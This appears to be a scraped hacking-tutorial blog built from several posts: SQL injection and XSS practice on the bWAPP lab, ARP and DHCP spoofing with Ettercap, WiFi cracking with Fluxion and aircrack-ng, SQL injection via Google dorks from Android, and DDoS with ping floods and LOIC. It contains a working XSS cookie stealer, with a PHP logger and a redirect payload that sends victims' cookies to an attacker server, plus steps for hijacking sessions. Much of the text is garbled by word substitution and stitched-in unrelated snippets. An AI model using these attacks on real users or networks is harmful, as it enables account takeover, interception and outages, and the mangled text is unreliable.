How To Practice Hacking With bWAPP ? : Tutorial


Appropriate, in this post will demonstrate to you proper methodologies to Practice Hacking with bWAPP and obviously with all the Hacking Techniques.

First of all , What is bWAPP all about ?

bWAPP (buggy Web Application)

bWAPP is a shaky open-source web application intended to enhance the aptitudes of understudies, designers or individuals intrigued by IT security to find and anticipate web vulnerabilities.

This application has more than 70 vulnerabilities, for example, SQL infusion, Cross-Site Scripting (XSS) or Denial of Service (DoS).

bWAPP is a PHP application that uses a MySQL database.

It can be facilitated on Linux, Windows and Mac with Apache/IIS and MySQL. It can likewise be introduced with WAMP or XAMPP.

Another plausibility is to download the honey bee box.

bWAPP can be installed in either of the two ways 

Option 1 — Windows bWAPP & XAMPP.

Option 2 — VM Ware Bee Box and Local Windows.

For knowing how to Install in Both of the ways Just Click Here .

Vulnerabilities that are incorporated into bWAPP are :

  • Daze SQL and Blind OS Command infusion 


  • Bash Shellshock (CGI) and Heartbleed weakness (OpenSSL)



  • Cross-Site Scripting (XSS) and Cross-Site Tracing (XST)



  • Cross-Site Request Forgery (CSRF)



  • AJAX and Web Services vulnerabilities (JSON/XML/SOAP/WSDL)



  • Malignant, unlimited document transfers and indirect access records



  • Verification, approval and session administration issues



  • Discretionary document get to and index traversals



  • Nearby and remote document considerations (LFI/RFI)



  • Arrangement issues: Man-in-the-Middle, cross-space approach documents, data disclosures,…



  • HTTP parameter contamination and HTTP reaction part



  • Disavowal of-Service (DoS) assaults: Slow HTTP and XML Entity Expansion



  • Shaky distcc, FTP, NTP, Samba, SNMP, VNC, WebDAV arrangements



  • HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) and web stockpiling issues



  • Unvalidated diverts and advances, and treat harming



  • Treat harming and unreliable cryptographic stockpiling



  • Server Side Request Forgery (SSRF)




  • XML External Entity assaults (XXE)

    Presently, We’ll see Practicing Hacking with bWAPP with a few Vulnerabilities


SQL Injection (Search) 

SQL Injection is a standout amongst the most unsafe helplessness you can discover in a site.

In this Example it’s requesting that we enter any motion picture name

  • Writing “solid” in the hunt field gives us one passage : “The Incredible mass”


  • So we can be almost certain that the question is something like

    “Select col1,col2,col3 from mytable where movie LIKE ‘%”. $userinput .”%”

  • On the off chance that the frame is defenseless, presenting a solitary ” should toss a SQL blunder in light of the fact that Select col1,col2,col3 from mytable where motion picture LIKE “”” is not a substantial inquiry.

  • Also, we can completely recover User Details from Database
  • be that as it may, before we need to know all the more what number of segments are returned ?
  • To discover the appropriate response we can utilize a “Request” provision inside our question : ” arrange by
  • The question sent to the database will be something like :

    Select col1,col2,col3 from mytable where movie LIKE ‘%’ order by 3 — -%’ which means the result will be ordered by the third column…if it exists ! Otherwise a SQL error will be thrown , we’ll try with 7 columns.

  • Presently we know the inquiry contains no less than 7 sections as no mistake is tossed.
    We can attempt with 8 sections.

  • So we got an Error ! So the inquiry contains 7 sections !


  • We would now be able to play out some shrewd questions


  • In the first place locate the present database :

    ‘and 1=0 union all select 1,2,database(),4,5,6,7 — –
    With “and 1=0 ” because we only want to get data from our union all statement.

  • As should be obvious, our database is called “bWAPP”.


  • There is a table called “clients” in this Database.

     Query :

‘ and 1=0 union all select 1,table_schema,table_name,4,5,6,7 from information_schema.tables where table_schema != ‘mysql’ and table_schema != ‘information_schema’ — –

  • table “users” exists.To discover the sections
    Query :

‘ and 1=0 union all select 1,table_name, column_name,4,5,6,7 from information_schema.columns where table_schema != ‘mysql’ and table_schema != ‘information_schema’ and table_schema=’bWAPP’ and table_name=’users’ — –

Presently we have all we have to recover all clients insider facts One last question :

‘ and 1=0 union all select 1,login,password,secret,email,admin,7 from users– –


Cross Site Scripting Reflected(GET)

  • bWAPP is approaching us for a lastname and firstname

  • So suppose I’m… Sherlock Holmes !

  • bWAPP welcomes us , and our information is thought about the page.


  • Investigate the URL of our page, it has been changed to

  • Parameters are gone through a GET ask for (in url)


  • We are currently going to test if parameters are sifted to ensure bWAPP against awful folks like you.


  • For instance, we can attempt a straightforward javascript infusion in the lastname field


  • Our script is executed and the ready box shows up.


  • Be that as it may, why ? Investigate the source code :

  • The lastname field containing our script is reflected in the page, and javascript is deciphered.


  • At this level, the script we infused in the page is not malevolent, but rather we’ll see in later XSS challenges how much cross site scripting can be intense.

HTML Web Storage(SECRET)

Here why attempt to take client’s login and mystery shakily put away in HTML5 neighborhood stockpiling.

What’s a nearby stockpiling ?

Agreeing Wikipedia, “Information put in neighborhood stockpiling is per root and holds on after the program is shut”

Given this reality, we realize that :

-Local stockpiling is a program highlight, we can misuse it utilizing javascript.

– Local stockpiling take after a similar starting point approach, which implies information embedded in neighborhood stockpiling by can’t be gotten to by

I’m certain you as of now oversaw bWAPP XSS challenge, so you know you can get to neighborhood stockpiling by means of XSS. You would then be able to allude to  Reflected XSS Get challenge.


Perusing a neighborhood stockpiling is truly basic, everything is open utilizing a javascript question named.. localStorage !

We can dump login and mystery asked by our queenbee with a solitary line of javascript.

for (var key in localStorage){document.write(‘
‘+ key + ‘ : ‘ + localStorage[key])};

Remote & Local File Inclusion

Record incorporation happens when an engineer needs to incorporate a page (html,txt,php,…) into another page.

For this situation, our adored ruler honey bee utilizes document incorporation


By and by, see that the URL changed directly after our choice.

We would now be able to see :


So pages lang_en.php, lang_nl.php and lang_fr.php are incorporated by your determination

In the event that you know php you as of now speculated the php code inside the hive must be something like :


Doing this, the record pointed by the dialect variable is prepared (included) by php.

Presently what happens on the off chance that we attempt to escape the www registry and get the/and so forth/passwd record

Current page is

http://your_ip/bWAPP/rlfi.php .

apache’s root index is regularly/var/www, expect our page is situated at


So’s the place we need to go : ../and so forth/passwd

With each “../” we mount one index : initial one leads us to/var/www, with the second one we’re in/var , and finaly the third places us in the server root catalog.

After that we can go to/and so on/passwd.

Simply incorporate this way in the URL set up of our included page parameter (lang_en.php) and see what happens:


you can see the watchword record ! We have first document consideration defenselessness .

With this blemish you can read any record coherent by the webserver procedure, including .htaccess documents.


I Hope this article brought you Requried Knowledge on bWAPP

I Hope this article is helpful to you and checkout the exclusive article on How To Track An Email?!

Happy Hacking.

How To Do DHCP Spoofing Using Ettercap ? [MITM Series : 3]


Hello, welcome all hackers, and geeks, In this tutorial we’ll learn DHCP Spoofing using Ettercap and all about DHCP server.

In Previous article we’ve learned DNS spoofing using dnsspoof and ettercap please do read that.

What is DHCP?

DHCP stands for Dynamic Host Control Protocol. which is usually as server. or service on network. which is basically used to assign IP address to all the hosts.
The working of DHCP is simple, the client user queries to DHCP server for asigning IP address and DNS and DHCP server provides the IP address and DNS services Server IP with lease time.
lease time is given by DHCP for IP address valid time.

DHCP Spoofing

DHCP spoofing has 2 attacks
1.DHCP starvation attack
DHCP startvation attacks is similar to DOS attack, where attacker floods the fake MAC address and fake users on a network until the DHCP database becomes full and confuses to give IP address so that legitimate user don’t get connection.
2.DHCP rouge server attack
This attack will be explained here, DHCP rouge server attack where the attacker create a fake DHCP server and intercept the DHCP requests and providing fake IP address by poisoning DHCP responses.

DHCP attack scenario

As I’ve explained above we’ll get into a network and by providing a IP pool and DNS server with netmask we’ll setup fake DHCP server at our Kali Linux machine and give fake responses to clients connected. so that we can get to know what they’re doing and we can sniff the HTTP data connections using WireShark.

Getting started with Ettercap

We’ll use Ettercap for this attack. if you don’t have ettercap on linux please install it by just running this command in debain based linux destributions

sudo apt-get install ettercap

After finished installation please run this command to get GUI version of ettercap

ettercap -G

then go to main tab and select start sniffing then go to MITM tab and select DHCP spoofing from the drop down list.

small popup menu will be apeared there you have to give pool of IP address which you want to attack. you must provide IP address by knowing the Gateway IP address. you can get that from just running ifconfig command on terminal.

Then provide the IP address pool as follows. If your gateway is then give

this will attack whole subnet of the gateway. then specify the gateway as you know above.
then specify DNS as the standard DNS server.
then start attack. you can see attack progress in the bottom bar as here.


When ever a client requests for IP address our rouge DHCP server gives fake responses. and DHCP assigns our desired IP address.
Now you are free to open wireshark and play with clients packets transmissions.

I Hope this article was helpful We’ll discuss ICMP redirection and Router Admin control DOS attacks in future part of this article.

U.S. Marshals Says Prisoners’ Personal Information Taken In Data Breach

A data breach at the U.S. Marshals Service exposed the personal information
of current and former prisoners, TechCrunch has learned. #marshals
#prisoners #techcrunch #breach Link:

How To Sniff Data Using ARPspoof & Ettercap ? [MITM Series : 1]


Hello world, In this article we’ll learn about ARP Spoofing using arpspoof and Ettercap. arpspoof the command line shell. and also graphical Ettercap.

What is ARP ?

ARP stands for Address Resolution protocol which quires the hosts on a network for the MAC address which is Physical address of the systems which is connected on that network LAN.
Basically what happens is the ARP protocol broadcast the IP address of the hosts there are connected and quires for MAC address. when a host returns the MAC address the ARP stores the MAC address with the IP address of that host.

Attack Scenario:

What we are doing is we are poisoning the ARP request with fake responses. as the ARP goes on broadcasting we’ll spoof our IP address even if we don’t have legitimate MAC address. so we will get illegitimate access to other computers connection. we can get the DNS requests, HTTP and all the network traffic from other users. that is our victim.

We are using arpspoof a command line shell, you can get that by this command .

sudo apt-get install arpspoof

After installing you can use this tool. there are two methods to make this.
One way poisoning and Two way Poisoning.
In One way poisoning we used to spoof the requested made by host victim to router.
Two way poisoning deals about both from victim to router and router to victim.
We’ll discuss both attacks.

For getting the network traffic you should have network packet analyzer. there are many applications .
you can use any. I prefer Wireshark. 
You can go through this tutorial about getting wireshark in your Linux or windows machine.

Getting Started:

First you should echo out all the connections going through the Network so Open 2 Terminals for performing 2way poisoining.
First you’ve to run this command to echo out connections.

echo 1> /proc/sys/net/ipv4/ip-forward

After this command you should start poisoning by running this command on both terminals.
At Terminal 1

arpspoof -t <victim_ip> <gateway_ip>

This will poison all the quesries going from victim to router host
At Terminal 2

arpspoof -t <gateway_ip> <victim_ip>

This will poison all the quesries going from router host to victim.
You can now free to open the wireshark and capture packets filter it. HTTP
We’ve a articles on Wireshark you can refer that to learn wireshark and how to make use of it.


Ettercap is a graphical user interface. we can have may LAN attcks MITM atacks on that by easily. you can install it on linux just by

sudo apt-get install ettercap

Run it from terminal using

ettercap -G

There on up bars you can find the MITM tab where there is a ARP spoof.

First you need to start Unified sniffing. then go for hosts and scan hosts.

Add Victims IP address to Target 1 and Gateway Ip address to target 2
Then come to MITM tab and select ARP spoofing you can use two way poisoning just by checking the check-box.

and start capturing packets on network using wireshark.

I hope this article was helpful in understanding the ARP spoof in two methods we’ll continue this MITM series in next article. we’ll discuss DNS Spoofing attack in next article. of this series.

How To Hack WiFi Using Fluxion In Kali Linux

Hacking WiFi Social engineering method with Fluxion


Today we will try Hacking WiFi Social engineering method with Fluxion Attack on WiFi. This method works good and this method is easy to implement and most working one.

How To Hack WiFi Using Fluxion In Kali Linux.

We Require following..
1. Fluxion
2. Aircrack-ng
3. mdk3 (optional)

This hack works on Linux..
First, download and install fluxion from here

Install this tool on GitHub
Simply clone the link which is there on GitHub and come to terminal..
git clone

After Successful installation run this tool.
by executing it’s script


make sure that the fluxion folder has sufficient access rights and ./fluxion file has executable permission.
if not such a case just types this in the terminal
chmod 755 ./fluxion


on the startup of this tool fluxion asks you to specify which WLAN interface do you use to hack WiFi
if you have an external WiFi card and you’d like to use that just get the interface and specify.
if you use Internal WLAN card that is wlan0 Press 1 to continue

the fluxion initializes all the network cards and automatically turns your NIC to monitor mode
it will show the list of available targets to select the target by pressing the ID number of that connection.

after selection of a target, fluxion shows many options and types of hacking..

How To Hack WiFi Using Fluxion In Kali Linux

we will select option 1 for creating fake AP (access point) and press ENTER.
then we will select tool dependency tool for cracking WiFi password
press ENTER to skip and then select 1 for choosing aircrack-ng from handshake checking options.

for getting the password you should perform

How To Hack WiFi Using Fluxion In Kali Linux


How To Hack WiFi Using Fluxion In Kali Linux

De-authentication attack that target wifi so you can select all user by typing 1 or you can select particular users MAC address and De-authenticate him.
After selecting 1 it will open 2 windows, one for capturing WPA handshake and other for de-authenticate all clients. Now enter 1 on the MENU window to check handshake without closing the other windows.

After checking handshake it will ask for choosing the Web Interface, so select 1 and press ENTER.
or also if you know the router model you can have that type of web interface to make this work.
Now it will ask for choosing the language, so select 1 for ENGLISH and press ENTER.
Now it will open 4 windows starting the fake AP and De-authenticating the clients of the wifi network.
and it also opens DNS spoofing on the target wiFi so that his all requests DNS queries are poisoned until he specifies a password and that password matches with our captured password nonce.

so you can get persistent wifi access and real password on the wifi. and password file will be there in our present location of the terminal.

I hope this will help you to understand Social engineering attack on wifi and you can hack wifi..easily

How To Steal Cookies With XSS ?! : Tutorial


In this tutorial, we will exploit the Cross Site Scripting (XSS) vulnerability for Cookie Stealing! I guess you already know a bit of the theory behind XSS, so we’ll get right to the code.

Read our previous tutorial on XSS Hack, to get a rough idea of it.

Let’s say a web page has a search function that uses this code:



<tr><td>Name</td><td><input type="text" name="advisor_name" value="<script>alert("test")</script>"></td></tr>

Note the quotes around our script. So what do we do? We need to end the value field before our script can actually be executed. So we tweak our test injection a bit:




This should close the quotes end the input section so that our script can be rendered as a part of the source instead of plain text. And now when we hit enter we get a nice pop-up box saying “test”, showing us our script was executed.

Keep in mind that you’re not actually writing this data to the server (unless you’re injecting it with a script that actually modifies the page on the server’s end also, like a guestbook or comment script), just changing how the dynamic page is acting on your end. If you want someone else to see what you see when you use this injection, you need to send them the link with that injection already in the page.

For example.



Of course, if you don’t want the recipient to see the injection, you’ll need to hex the query. You can do that here.

Hexing the query of this url gives us


Quote: f%73%63%72%69%70%74%3e

The above is a very simple case of finding an XSS injection vulnerability. Some html and javascript knowledge is definitely helpful for finding more complicated ones, but code like the above works often enough.

Using XSS For Cookie Stealing

Cookie Stealing With XSS

OK, so now you know the page is vulnerable to XSS injection. Great. Now what? You want to make it do something useful, like steal cookies. Cookie stealing is when you insert a script into the page so that everyone that views the modified page inadvertently sends you their ******* cookie. By modifying your ******* cookie, you can impersonate any user who viewed the modified page. So how do you use XSS to steal cookies?

The easiest way is to use a three-step process consisting of the injected script, the cookie recorder, and the log file.

First you’ll need to get an account on a server and create two files, log.txt and whateveryouwant.php. You can leave log.txt empty. This is the file your cookie stealer will write to. Now paste this php code into your cookie stealer script (whateveryouwant.php):




function GetIP()
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = "unknown";

function logData()
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");



This script will record the cookies of every user that views it.

Next Step!

Now we need to get the vulnerable page to access this script. We can do that by modifying our earlier injection:



"><script language= "JavaScript">document.location="" + document.cookie;document.location=""</script> is the server you’re hosting your cookie stealer and log file on, and is the vulnerable page you’re exploiting. The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don’t know anything happened. Note that this injection will only work properly if you aren’t actually modifying the page source on the server’s end. Otherwise the unmodified page will actually be the modified page and you’ll end up in an endless loop. While this is a working solution, we could eliminate this potential issue when using source-modifying injections by having the user click a link that redirects them to our stealer:




to this:



echo '<b>Page Under Construction</b>'

Now when you open log.txt, you should see something like this:



IP: | PORT: 56840 | HOST: | Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko/2009032711 Ubuntu/8.10 (intrepid) Firefox/3.0.8 | METHOD: | REF: |
DATE: Tuesday 21st 2017f April 2017 05:04:07 PM | COOKIE: cookie=PHPSESSID=889c6594db2541db1666cefca7537373

You will most likely see many other fields besides PHPSESSID, but this one is good enough for this example. Now remember how to edit cookies like I showed you earlier? Open up firebug and add/modify all your cookie’s fields to match the data from the cookie in your log file and refresh the page. The server thinks you’re the user you stole the cookie from. This way you can log into accounts and many other things without even needing to know the passwords or usernames.

Winding Up Altogether!

1. Test the page to make sure it’s vulnerable to XSS injections.

2. Once you know it’s vulnerable, upload the cookie stealer php file and log file to your server.

3. Insert the injection into the page via the url or text box.

4. Grab the link of that page with your exploited search query (if injection is not stored on the server’s copy of the page).

5. Get someone to use that link if necessary.

6. Check your log file for their cookie.

7. Modify your own cookie to match the captured one and refresh the page

How To Hack WPA2 WEP Protected Wifi Using Aircrack-ng

How To Hack WPA2 WEP Protected Wifi Using Aircrack-ng
This post deals about hacking WPA WPA2/WEP protected WiFi security
using Aircrack-ng
WEP has been deprecated since early 2001, WPA was introduced as an industry standard, which used TKIP for encryption of data. Later, WPA2 became an industry standard since it introduced AES encryption, which is more powerful than TKIP; however, it also supports TKIP encryption. The WPA/WPA2 key that we would use to authenticate on a wireless network is used to generate another unique key. Five additional parameters would be added to our key to generate a unique key. The parameters are the SSID of the network authenticator, Nounce (ANounce), supplicant Nounce (SNounce), authenticator MAC address (access point MAC), and suppliant MAC address (WiFi client MAC). From a hacker’s perspective, we can use a brute force or dictionary attack or rainbow tables to crack a WPA/WPA2 network, obviously a dictionary attack is much less time consuming than other attacks; therefore it should be your first preference. The success rate of this attack depends upon the wordlist you would use. Another requirement for this attack to work is the four-way handshake, which takes place between a client and an access point, which we will capture using the deauthentication attack.
Let’s see how we can use Aircrack-ng to crack a WPA/WPA2 network:


Step 1—First of all, ensure that your network card is inside the monitoring mode.
Step 2—Next, we would listen on the mon0 interfaces for other access points having encryption set to either wpa or wpa2. We would use the “airmon-ng mon0” command to do it.
Our target AP would be Shaxter, which uses WPA as their encryption type. We will take a note of its BSSID and the channel that it’s on, this information would be useful in the upcoming steps. BSSID:
F4:3E:61:92:68:D7 Channel:


Capturing Packets
Step 3—Next, we need to save the data associated with our access point to a specific file. The inputs we need to specify are the channel, the bssid, and the file name to write.
Command: airodump-ng –c 1 –w rwap –bssid F4:3E:61:92:68:D7 mon0
◾ –w—File to write ◾ –c—Channel

Capturing the Four-Way Handshake Step 4—In order to successfully crack WAP, we would need to capture the four-way handshake. As mentioned, to achieve this we could use a deauthentication attack to force clients to disconnect and reconnect with the access point. Structure
aireplay-ng –deauth 10 –a ≤Target AP≥ –c ≤Mac address of Mon0≥mon0 Command: aireplay-ng –deauth 10 –a F4:3E:61:92:68:D7 –c 94:39:E5:EA:85:31 mon0
After we have successfully performed a deauthentication attack, we will be able to capture the four-way handshake. Cracking WPA/WAP2 Now that we have all the inputs required for cracking the WPA/WPA PSK, we will use aircrackng and specify a wordlist that would be used against the rhawap.cap file that was generated earlier. Remember that in order for us to successfully crack the WPA/WPA2 PSK, we need to make sure that our file contains the four-way handshake. Structure
aircrack-ng –w Wordlist ‘capture_file’.cap Command: aircrack-ng rhawap.cap –w/pentest/passwords/wordlists/darkc0de.lst
So, now this will start the dictionary attack against the rhawap.cap file, and if the key is found in the dictionary, it will reveal it to us.

We’re an authorized EC-Council Partner



HackeRoyale is an official reseller of EC-Council online training! Thinking of trading that black hat in for a red one? Check out the classes to get started!

Why iClass

CEH Overview

Online iLabs Demo

Choose Your Training Option:

Self Paced Training

iLearn, Self-Paced Streaming Video

iLearn is an asynchronous, self-study environment that delivers EC-Council’s IT Security training courses in a streaming video format. All lectures are delivered by a professional practitioner to assure a real-world perspective on the course concepts.

Base Package Includes:
  • Instructor led training modules (1 year access)
  • Official e-courseware (1 year access)
  • iLabs access (6 Months Access) (Not applicable to CCISO)
  • Certificate of Completion for each course
  • Exam Voucher
Live Online Training

iWeek, Live, Online

This course is instructor-led and gives you the feel of a live course without the additional cost of travel. iWeek comes with a certification exam voucher and extended access to EC-Council’s iLabs*, online lab platform.

In Person Training

Instructor-Led Schedule

For those who want to come and join EC-Council for a live, in-person, Instructor-led course you can view our complete schedule of courses here.

Choose Your Course:


For More Information Contact Us!

How to do SQL injection on Android using DriodSQLi

How to do SQL injection on Android using DriodSQLi

Hello folks! SQL injection on Android has dependably been an a good time for programmers, particularly novices! Be that as it may, hold up a moment, have you at any point thought of doing this assault from your telephone? This isn’t a fantasy or bad dream please. Today I’m going to demonstrate to you the means with respect to how you can do this comfortable fingertips! Praise, lets proceed onward!

Before beginning further, on the off chance that you are confounded about SQL, what do SQL infusion assault truly mean, I counsel you to peruse this instructional exercise some time recently:


Additionally Read these articles to get a brisk thought with reference to how you can accomplish this straight from your crate. Given underneath is a point by point direct on SQL Injection assaults, and to be noticed, these instructional exercises have picked up a basic thankfulness as well. I exceptionally suggest you as well, to experience it!

How to do SQL injection without any tool TUTORIAL PART 1

How to do SQL injection without any tool TUTORIAL PART 2

MUST READ IF YOU’RE NEW TO THIS BLOG: How to do SQL injection without any tool TUTORIAL PART 3

How to do SQL injection without any tool TUTORIAL PART 4

Lets start now! You need to have a rooted Android. To know more read :

How to root any Android in 2 minutes

First you have to download the apk file from here :

(Copy the above link and download)

Now you should have little knowledge of Google dorks.Here is the list of Google dorks vulnerable to SQL injection:










Here is the link to download a whole list :

Let’s take an example to describe the process in step by step manner:

For eg:

1. Let’s take a google dork link 


2.Copy and paste this link to Google.

SQL injection on Android using DriodSQLi

3.At that point tap on any connection that you wish to infuse with SQL for eg:

Also Read: How to install Kali Linux on your Android

4.Duplicate the entire URL

SQL injection on Android using DriodSQLi

5.Presently, open the DriodSQLi apk



At that point at the place of Target URL:

Glue the duplicated interface from Google i.e.(

SQL injection on Android using DriodSQLi

7. At that point tap on Inject 

SQL injection on Android using DriodSQLi

Done hold up till the procedure closes.

Also Read: How to bypass any Applock security without knowing passwords, pins or pattern lock

SQL injection on Android using DriodSQLi

Wow we have effectively hacked the database with SQL.

Hope you enjoyed reading this tutorial SQL injection  through Android!

Do like, comment & share with your friends! 🙂

Happy Hacking!!

How to DDoS any website in a minute? Step-By-Step Guide

How to DDoS any website in a minute? Step-By-Step Guide


Recent events that have gone on in my favorite website have inspired me to inform people of the dangers of DDoS.

There is no anti-virus for DDoS. The only cure is knowledge. Informing the people is the only way to keep it from happening to them.

If you want to know more on DDoS, I suggest you reading this tutorial before moving on:

I know their are a lot more ways to DoS than are shown here, but i’ll let you figure them out yourself. If you find any mistake in this tutorial please tell me… 😉

What is “DDoS”?

How to DDoS any website in 2 minutes?

Denial of Service attacks (or Distributed Denial of Service attacks [DDoS]) are a form of organized attacks with the goal of taking down a server by overloading it. Often by sending useless information(packets) to a server in massive amounts.

Keep in mind that altough spreading knowledge is my main goal, performing DDoS attacks is indeed a federal cyber crime.

It is also an international offence and will be punished according to the local laws of the individual’s country.

But enough talk. I will now show you a quick example of a DoS attack of sorts you can do on your local computer.


Keep in mind that this is NOT a real DoS attack, but rather an example to visualize how a DoS attack works.

You will take down YOUR computer.

Step 1
Open up notepad, mousepad, or your favored equivalent.

Step 2
Type in this simple batch command

goto a

Step 3

Save as “dos.bat” making sure you select “All files” from the “File Type” dialog.

Step 4
Run that sucker, but save your work first, as this will crash even the best computers in a matter of minutes.

What did you learn from this?

Observe how the file rapidly replicates itself, opening a new CMD right after it opens another.
An infinite loop has been created that has filled the RAM with useless and massive amounts of CMDs (or Terminals for Unix folks)

DDoS attacks work much the same way, except instead of replicating an infinite number of CMDs, they send information(packets) to the server over and over and over again until the server crashes.

What information you may ask?

Anything. Your login name, your ‘online’ status, a new comment, the number of views on a video, your new high score. Absolutely any information that could be resent a massive amount of times to the same server.

Next we will be discussing the simplest form of DDoS.

DDoS by Ping Flood

Please note that I will be pinging my Localhost. You should too.

Perhaps one of the simplest ways to DoS is by using the ‘ping’ command built into most operating systems, including all windows and Linux distributions.

Step 1
Start up your server. Mine is apache, but that is beside the point, the server type does not matter. If it has an IP address, it can be pinged.

Step 2
Type in the ping command

ping -t -a -l 65500 localhost

Please note, I’ve mentioned above command for Windows users. Linux users don’t  need to specify the -t parameter. So, for UNIX/Linux users, the command would be as follows:

ping -a -l 65500 localhost

Step 3
Press enter and watch it ping the localhost over and over until your server crashes, or you get tired of waiting for it to crash.
Since most modern servers can take the stress of the ping flood, you will need to get all your friends to help you ping to bring your server down. Or even slow it down.

Command Explained

ping – tells the computer to ping a server
-t – It will continue to ping the server until the command is closed, or stopped.
-a – Resolves the address to host names.
-l – Size.

By default the ping will send 32 bytes of data to the server, so you must change this to a bigger number. The maximum is 65,500 bytes, so that is what we used.

If you send a server any number higher than 65,500 bytes it will instantly crash. This is called “Ping of Death“.
Like any other thing with the suffix “of Death” it is very rare, and hard to accomplish indeed.
In order to learn more about the Ping of Death, read my huge response to this very thread, here!

DDoS by Reloading

Something as simple as reloading a page can take down a server if done enough times.

Step 1
Make a page that lets you submit forms. Method=’GET’ is better than method=’POST’ for this, but both will work.
(If you do not understand step 1, just find a page that lets you submit information, like a new comment or upload a picture)

Step 2
Fill out the forms and submit

Step 3
Reload the page
If the page uses the POST method your browser will display a dialog asking if you are sure you want to resend the information, or something to that effect. Simply click “Continue” or “OK”.(see now why GET is better?)

Step 4
Keep reloading until server is down.
Their are many add ons and tools that allow you to auto-reload a page. It is a matter of googleing for them. They are widely available and free.

This method is very primitive as you can see, but it is probably the best way to DDoS.

Low-Orbit Ion Cannon

LOIC (Low Orbit Ion Cannon) is an app, written in C# and developed by praetox, that was used by Anonymous during Project Chanology. It attempts to DoS the target site by using all its bandwidth, sending TCP, UDP, or HTTP requests to the server until it crashes.

LOIC | Host: SourceForge | Size: 130kb

Step 1
Download and extract LOIC

Step 2
Open LOIC.exe and fill out the required information.

Instructions for filling out

IP or URL = IP or URL that you wish to DoS
TCP / UDP message = information being sent, just write something random. Or leave it as default.
Port = Server’s port
Method = Server’s Method, leave as TCP if unknown
If you are gonna try to take down a website then use HTTP
Speed = set to “<= faster”
Threads = How many users it should simulate, the higher the number the faster it will crash. Set to 10,000. Note that this might make your computer lag, if so, set to a lower amount.

Step 3
This starts your the program.


This tool might not seem like much, but many people of all ages have been arrested and convicted for knowingly using this tool. Remember DoS and DDoS are federal crimes, however insignificant it may seem. Use at your own discretion.


Now you know what a DDoS attack is and you can work to better protect your self.

Their are still many other ways to attack a server, but these are the basics of DoS.
Protect your servers. xD

Like any web developer I hope you will use this information for the good.
Sadly I know that their are those among us that are, even now as we read this, plotting how to do harm with this information.

To those, I flip the bird.

You may use this tutorial, in part or as a whole, for whatever purpose.

I hope you enjoyed reading this tutorial. Hit like, comment and share!